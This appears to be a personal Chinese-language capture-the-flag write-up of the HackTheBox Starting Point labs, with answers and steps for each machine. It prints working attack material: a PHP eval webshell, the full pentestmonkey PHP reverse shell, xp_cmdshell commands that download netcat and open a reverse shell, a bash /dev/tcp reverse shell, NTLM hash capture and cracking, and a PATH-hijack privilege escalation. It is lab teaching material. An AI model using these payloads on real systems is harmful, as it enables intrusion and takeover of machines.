HTB-StartingPoint

终于把 StartingPoint 打完了（累了）

Tier 0

比较简单就没写

Tier 1

Appoinment

Task 1

What does the acronym SQL stand for?
:Structured Query Language

Task 2

What is one of the most common type of SQL vulnerabilities?
:SQL injection

Task 3

What is the 2021 OWASP Top 10 classification for this vulnerability?
:A03:2021-Injection

Task 4

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# nmap -sS -sV -Pn 10.129.84.247
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 00:37 CST
Nmap scan report for 10.129.84.247
Host is up (0.60s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.07 seconds

What does Nmap report as the service and version that are running on port 80 of the target?
: Apache httpd 2.4.38 ((Debian))

Task 5

What is the standard port used for the HTTPS protocol?
:443

Task 6

What is a folder called in web-application terminology?
:directory

Task 7

What is the HTTP response code is given for 'Not Found' errors?
:404

Task 8

Gobuster is one tool used to brute force directories on a webserver. What switch do we use with Gobuster to specify we're looking to discover directories, and not subdomains?
:dir

Task 9

What single character can be used to comment out the rest of a line in MySQL?
:#

Task 10

直接访问 80 端口，一个登录框输入 admin'#

If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?
:Congratulations!

Submit Flag

Submit root flag
:e3d0796d002a446c0e622226f42e9672

Sequel

Task 1

During our scan, which port do we find serving MySQL?
:3306

Task 2

扫了半天扫不出来，准确来说扫不动，一扫就卡，可以直接连接

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# mysql -h 10.129.141.247 -P 3306 -uroot
WARNING: option --ssl-verify-server-cert is disabled, because of an insecure passwordless login.
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 63
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

可以看到是 MariaDB

What community-developed MySQL version is the target running?
:MariaDB

Task 3

When using the MySQL command line client, what switch do we need to use in order to specify a login username?
:-u

Task 4

Which username allows us to log into this MariaDB instance without providing a password?
:root

Task 5

In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
:*

Task 6

In SQL, what symbol do we need to end each query with?
:;

Task 7

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.353 sec)

使用 show databases;查看数据库

There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host?
:htb

Submit Flag

information_schema，mysql，performance_schema 这几个数据库是 MySQL 自带的，一般来说是四个默认库，还有一个 sys 库。所以我们查找东西也是从 htb ` 查找

MariaDB [(none)]> use htb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.335 sec)

MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.332 sec)

简单的 sql 查询语句查询

Submit root flag
:7b4bec00d1a39e3dd4e021ec3d915da8

Crocodile

Task 1

What Nmap scanning switch employs the use of default scripts during a scan?
:-sC

Task 2

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# nmap -sS -sV -Pn 10.129.1.15
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 01:18 CST
Nmap scan report for 10.129.1.15
Host is up (0.95s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Unix

What service version is found to be running on port 21?
:vsftpd 3.0.3

Task 3

What FTP code is returned to us for the "Anonymous FTP login allowed" message?
:230

Task 4

After connecting to the FTP server using the ftp client, what username do we provide when prompted to log in anonymously?
:anonymous

Task 5

After connecting to the FTP server anonymously, what command can we use to download the files we find on the FTP server?
:get

Task 6

用 get 传下来，可以看到是 admin

What is one of the higher-privilege sounding usernames in 'allowed.userlist' that we download from the FTP server?
:admin

Task 7

What version of Apache HTTP Server is running on the target host?
:Apache httpd 2.4.41

Task 8

What switch can we use with Gobuster to specify we are looking for specific filetypes?
:-x

Task 9

扫目录扫到 login.php

Which PHP file can we identify with directory brute force that will provide the opportunity to authenticate to the web service?
:login.php

Submit Flag

把 allowed.userlist.passwd 传下来，里面有密码，使用 admin:rKXM59ESxesUFHAd 登录

进去就是 flag

Submit root flag
:c7110277ac44d78b6a9fff2232434d16

Responder

Task 1

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# nmap -sS -sV -Pn 10.129.40.166
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 01:52 CST
Nmap scan report for 10.129.40.166
Host is up (0.37s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)

访问 80 端口

When visiting the web service using the IP address, what is the domain that we are being redirected to?
:unika.htb

Task 2

Which scripting language is being used on the server to generate webpages?
:php

Task 3

What is the name of the URL parameter which is used to load different language versions of the webpage?
:page

Task 4

本地文件包含 (LFI)，就是读取一些系统本地的敏感信息，一般通过路径来读取

Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
:../../../../../../../../windows/system32/drivers/etc/hosts

Task 5

远程文件包含，参数一般是一个远程的 url 地址

Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
://10.10.14.6/somefile

Task 6

简单了解了一下 NTLM，New Technology LAN Manager，是微软用于 Windows 身份验证的一个协议。官方说的是：

NTLM 身份验证协议根据一种证明是服务器或域控制器的挑战/响应机制对用户和计算机进行身份验证，用户要知道该服务器和域控制器的与帐户关联的密码。 在使用 NTLM 协议时，每当需要新的访问令牌时，资源服务器必须执行以下操作之一来验证计算机或用户的身份：

• 如果计算机或用户的帐户是域帐户，请联系域控制器的部门域认证服务来获取该帐户的域。
• 如果该计算机或用户的帐户是本地帐户，请在本地帐户数据库中查找该帐户。

官方确实太官方了，说白了就是 challenge/response 认证机制在验证用户的过程中是不需要传输用户的明文密码的。

What does NTLM stand for?
:New Technology LAN Manager

Task 7

Responder 是一款少有的可以通过中继 NTLMv2哈希来获取网络中机器的 shell 访问权限的内网工具，详细了解可以看 https://ew1z4rd.github.io/post/Responder%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%A5%9E%E5%99%A8/ 这篇文章，这个工具 kali 自带

Which flag do we use in the Responder utility to specify the network interface?
:-I

Task 8

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?.
:John The Ripper

Task 9

指定

responder -I tun0

然后访问一个不存在的文件让它报错

http://unika.htb/?page=//10.10.16.51/butt3rf1y

把 Hash 那串复制下来爆破，但是我用 john 破解的时候出现了如下报错

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# john b.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
No password hashes left to crack (see FAQ)

查了一番才知道，这个报错原因是因为这个文件被破解过（哪来的啊？？？why？？？），结果就在 john.pot 中

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# cat ~/.john/john.pot
$P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/:104567
$NETNTLMv2$ADMINISTRATORRESPONDER$25d61c9246d5479b$1d382c449a1d964839832984788288f4$010100000000000080b7bdeb8282db01d76b82bee9aff7d70000000002000800340059004d00370001001e00570049004e002d00470050004b0032004f0054005600460030004800360004003400570049004e002d00470050004b0032004f005400560046003000480036002e00340059004d0037002e004c004f00430041004c0003001400340059004d0037002e004c004f00430041004c0005001400340059004d0037002e004c004f00430041004c000700080080b7bdeb8282db01060004000200000008003000300000000000000001000000002000005ac722d42e809e0b0701cfcf2610b582b82cb93eb9627709f712e596b9e1fec00a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00350031000000000000000000:badminton

或者用 –show 来查看

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# john --show b.txt
Administrator:badminton:RESPONDER:25d61c9246d5479b:1D382C449A1D964839832984788288F4:010100000000000080B7BDEB8282DB01D76B82BEE9AFF7D70000000002000800340059004D00370001001E00570049004E002D00470050004B0032004F0054005600460030004800360004003400570049004E002D00470050004B0032004F005400560046003000480036002E00340059004D0037002E004C004F00430041004C0003001400340059004D0037002E004C004F00430041004C0005001400340059004D0037002E004C004F00430041004C000700080080B7BDEB8282DB01060004000200000008003000300000000000000001000000002000005AC722D42E809E0B0701CFCF2610B582B82CB93EB9627709F712E596B9E1FEC00A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00350031000000000000000000

密码是 badminton

What is the password for the administrator user?
:badminton

Task 10

nmap 扫

We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
:5985

Submit Flag

5985 主要是 WinRM（Windows Remote Managementd）,Windows 的远程管理，使用 WinRM 可以在对方有设置防火墙的情况下远程管理这台服务器，因为启动 WinRM 服务后，防火墙默认会放行 5985 端口。

Evil-WinRM，kali 自带

evil-winrm -i 10.129.40.166 -u administrator -p badminton

登进去之后发现啥也没有，一直找，找到了个 mike 用户

在 mike 用户下找到 flag

Submit root flag
:ea81b7afddd03efaa0945333ed147fac

Three

Task 1

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# nmap -sS -sV -Pn 10.129.131.234
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 04:49 CST
Nmap scan report for 10.129.131.234
Host is up (0.50s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.03 seconds

How many TCP ports are open?
:2

Task 2

What is the domain of the email address provided in the "Contact" section of the website?
:thetoppers.htb

Task 3

In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
:/etc/hosts

Task 4

用 gobuster 扫描

gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb  --append-domain

Which sub-domain is discovered during further enumeration?
:s3.thetoppers.htb

Task 5

只有一条 json 信息

搜了一下 s3，Amazon S3, 全名 Amazon Simple Storage Service，Amazon 提供的网络数据存储服务

Which service is running on the discovered sub-domain?
:Amazon S3

Task 6

可以通过 AWSCLI 来与 s3 进行交互，具体请看 AWS CLI

Which command line utility can be used to interact with the service running on the discovered sub-domain?
:awscli

Task 7

具体看官方文档

Which command is used to set up the AWS CLI installation?
:aws configure

Task 8

aws --endpoint http://s3.thetoppers.htb s3 ls

What is the command used by the above utility to list all of the S3 buckets?
:aws s3 ls

Task 9

aws --endpoint http://s3.thetoppers.htb s3 ls
2025-02-19 04:43:54          0 .htaccess
2025-02-19 04:43:54      11952 index.php

This server is configured to run files written in what web scripting language?
:php

Submit Flag

写一个一句话

<?php @eval($_GET["a"]);?>

传上去

aws --endpoint http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb/shell.php

然后直接 curl

Submit root flag
:a980d99281a28d638ac68b9bf9453c2b

Tier 2

Archetype

Task 1

nmap 扫描，扫到了 1433 端口的 ms-sql-s

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# nmap -sC -sV 10.129.215.139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-03 16:52 CST
Nmap scan report for 10.129.215.139
Host is up (0.48s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open       Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info:
|   10.129.215.139:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2025-03-03T08:53:01+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-03-03T08:44:06
|_Not valid after:  2055-03-03T08:44:06
| ms-sql-ntlm-info:
|   10.129.215.139:1433:
|     Target_Name: ARCHETYPE
|     NetBIOS_Domain_Name: ARCHETYPE
|     NetBIOS_Computer_Name: ARCHETYPE
|     DNS_Domain_Name: Archetype
|     DNS_Computer_Name: Archetype
|_    Product_Version: 10.0.17763
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-03-03T00:52:45-08:00
|_clock-skew: mean: 1h36m02s, deviation: 3h34m41s, median: 1s
| smb2-time:
|   date: 2025-03-03T08:52:46
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.51 seconds

Which TCP port is hosting a database server?
:1433

Task 2

关于 SMB（服务器消息块）服务器是一种网络协议，允许设备通过网络共享文件、打印机和其他资源，通过网络促进客户端和服务器之间的通信，可以通过 smbclient 连接

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# smbclient -N -L \\\\10.129.215.139\\

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backups         Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.215.139 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

通过 IP 使用 -N 无密码连接，查看

What is the name of the non-Administrative share available over SMB?
:backups  

Task 3

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# smbclient -N \\\\10.129.215.139\\backups
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 20 20:20:57 2020
  ..                                  D        0  Mon Jan 20 20:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 20:23:02 2020

                5056511 blocks of size 4096. 2618271 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> ^Z
[3]+  Stopped                 smbclient -N \\\\10.129.215.139\\backups

把配置文件 prod.dtsConfig 下载下来

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# cat prod.dtsConfig
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYP
        E\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc

What is the password identified in the file on the SMB share?
:M3g4c0rp123

Task 4

impacket

进入 impacket/examples/ 执行

python3 mssqlclient.py sql_svc@10.129.215.139 -windows-auth

不知道为什么，我的只能执行用户 ID 为 sql_svc，而不是 ARCHETYPE\sql_svc

What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
:mssqlclient.py

Task 5

https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

SELECT is_srvrolemember(‘sysadmin’);

检查是否有权限，返回 1 就是有

xp_cmdshell

SQL SERVER 有一个 xp_shell 的扩展存储过程可以生成 windows shell，xp_cmdshell 是一个 SQL Server 的扩展存储过程，它允许执行操作系统命令。在默认情况下,xp_cmdshell 可能在 SQL Server 上被禁用，需要先启用它

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
#启动 p_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
:xp_xmdshell

Task 6

Windows 提权工具 winpeas

What script can be used in order to search possible paths to escalate privileges on Windows hosts?
:winpeas

Task 7

我先上传了 nc ，然后连上了靶机，所以就直接在里面 wget 了

wget http://10.10.16.31:8000/winPEASx64.exe -o winPEASx64.exe

然后直接运行

./winPEASx64.exe

查看 Powershell Settings 这里的数据

查看 ps 的历史记录

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PS C:\users\sql_svc> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

拿到密码：MEGACORP_4dm1n!!

What file contains the administrator's password?
:ConsoleHost_history.txt

Submit Flag

wsl 另外起一个 http 服务，目录下要存在 nc64.exe ，用于上传到靶机

python3 -m http.server

然后再执行

EXEC xp_cmdshell 'curl -o C:\Users\sql_svc\nc.exe http://10.10.16.31:8000/nc64.exe';

太不容易了，终于传上去了

然后执行，反弹 shell

EXEC xp_cmdshell 'C:\Users\sql_svc\nc 10.10.16.31 1234 -e powershell';

监听得到

进入 sql_svc 用户得到 userflag

Submit user flag
:3e7b102e78218e935bf3f4951fec21a3

Submit Flag

根据之前找到的用户和密码

administrator:MEGACORP_4dm1n!!

用 psexec 进行连接

python3 psexec.py ARCHETYPE/administrator@10.129.50.161

Submit root flag
:b91ccec3305e98240082d4474b848528

Oopsie

Task 1

With what kind of tool can intercept web traffic?
:proxy

Task 2

┌──(root㉿butt3rf1y)-[/home/butt3rf1y]
└─# nmap -sS -sC -Pn 10.129.191.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-04 21:43 CST
Nmap scan report for 10.129.191.100
Host is up (0.49s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey:
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http

开了 22 和 80，访问 80

What is the path to the directory on the webserver that returns a login page?
:/cdn-cgi/login

Task 3

What can be modified in Firefox to get access to the upload page?
:cookie

Task 4

id=1 时为 admin

http://10.129.191.100/cdn-cgi/login/admin.php?content=accounts&id=1

What is the access ID of the admin user?
:34322

Task 5

On uploading a file, what directory does that file appear in on the server?
:/uploads

Task 6

在 uploads 上传一个一句话木马，蚁剑连接，/var/www/html/cdn-cgi/login/ 路径下找到

db.php 文件

<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>

What is the file that contains the password that is shared with the robert user?
:db.php

Task 7

What executible is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?
:find

Task 8

传上去的文件几分钟就被删了，有定时任务，弹个 shell，用 kali 自带的 webshell，/usr/share/webshells/php 下的 php-reverse-shell.php

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
        // Fork and have the parent process exit
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }

        // Make the current process a session leader
        // Will only succeed if we forked
        if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
        }

        $daemon = 1;
} else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
        printit("$errstr ($errno)");
        exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
        printit("ERROR: Can't spawn shell");
        exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
        // Check for end of TCP connection
        if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
                break;
        }

        // Check for end of STDOUT
        if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
                break;
        }

        // Wait until a command is end down $sock, or some
        // command output is available on STDOUT or STDERR
        $read_a = array($sock, $pipes[1], $pipes[2]);
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

        // If we can read from the TCP socket, send
        // data to process's STDIN
        if (in_array($sock, $read_a)) {
                if ($debug) printit("SOCK READ");
                $input = fread($sock, $chunk_size);
                if ($debug) printit("SOCK: $input");
                fwrite($pipes[0], $input);
        }

        // If we can read from the process's STDOUT
        // send data down tcp connection
        if (in_array($pipes[1], $read_a)) {
                if ($debug) printit("STDOUT READ");
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit("STDOUT: $input");
                fwrite($sock, $input);
        }

        // If we can read from the process's STDERR
        // send data down tcp connection
        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);
        }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
        if (!$daemon) {
                print "$string\n";
        }
}

?>

把 IP 和 Port 改一下然后传上去，监听

$ su
su: must be run from a terminal

必须要交互 shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

find / -type f -group bugtracker 2>/dev/null
ls -al /usr/bin/bugtracker

Regardless of which user starts running the bugtracker executable, what's user privileges will use to run?
:root

Task 9

SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件权限。在 Linux/Unix 中，当一个程序运行的时候， 程序将从登录用户处继承权限。SUID 被定义为给予一个用户临时的（程序/文件）所有者的权限来运行一个程序/文件。简而言之用户在执行程序/文件/命令的时候，将获取文件所有者的权限以及所有者的 UID 和 GID。

简而言之就是，在使用命令时给普通用户赋予所有者的权限，比如 root 权限

What SUID stands for?
:Set owner User ID

Task 10

What is the name of the executable being called in an insecure manner?
:cat

Submit Flag

蚁剑连接时查看 userflag

Submit user flag
:f2c74ee8db7983851ab2a96a44eb7981

Submit Flag

从前面已经发现 bugtracker 有 root 权限，并且我们能够调用 cat 命令，cat 命令是使用绝对路径来调用的，即在当前用户的环境变量指定的路径中查找 cat 命令，所以可以创建一个恶意的 cat 命令，并修改当前用户环境变量，将权限提升为 root

export PATH=/tmp:$PATH			//将/tmp目录设置为环境变量
cd /tmp/				//切换到/tmp目录下
echo '/bin/sh' > cat			//构造恶意的cat命令
chmod +x cat				//赋予权限

bugtracker 调用 cat 命令时实际上调用的是 ``/tmp` 目录下的恶意的 cat 命令，此时 robert 用户临时具有了root 权限，uid 变成了root，但不是 root 用户

Submit root flag
:af13b0bee69f8a877c3faf667f7beacf

Vaccine

Task 1

└─# nmap -sS -sC -Pn 10.129.69.163
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-05 00:23 CST
Nmap scan report for 10.129.69.163
Host is up (1.9s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.16.36
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
22/tcp open  ssh
| ssh-hostkey:
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open  http
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: MegaCorp Login

Nmap done: 1 IP address (1 host up) scanned in 97.70 seconds

21 FTP、22 SSH、80 HTTP

Besides SSH and HTTP, what other service is hosted on this box?
:FTP

Task 2

FTP 的匿名登录

anonymous:anonymous

This service can be configured to allow login with any password for specific username. What is that username?
:anonymous

Task 3

ftp> ls
229 Entering Extended Passive Mode (|||10202|)
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
226 Directory send OK.

What is the name of the file downloaded over this service?
:backup.zip

Task 4

使用 john 爆破

zip2john backup.zip > crack

john -wordlist=/usr/share/wordlists/rockyou.txt crack

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?
:zip2john

Task 5

解压 zip 文件

unzip backup.zip
密码:741852963

拿到用户名和密码

admin:qwerty789

What is the password for the admin user on the website?
:qwerty789

Task 6

What option can be passed to sqlmap to try to get command execution via the sql injection?
:--os-shell

Task 7

进入网站发现存在 sql 注入点，sqlmap 跑一下，跑的超级慢

python sqlmap.py -u http://10.129.34.175/dashboard.php?search=Pico --cookie="PHPSESSID=9ak49pbfau0kfkh436vo92tft0" --os-shell --batch

反弹一个 shell 去监听

bash -c "bash -i &> /dev/tcp/10.10.16.36/1234 0>&1"

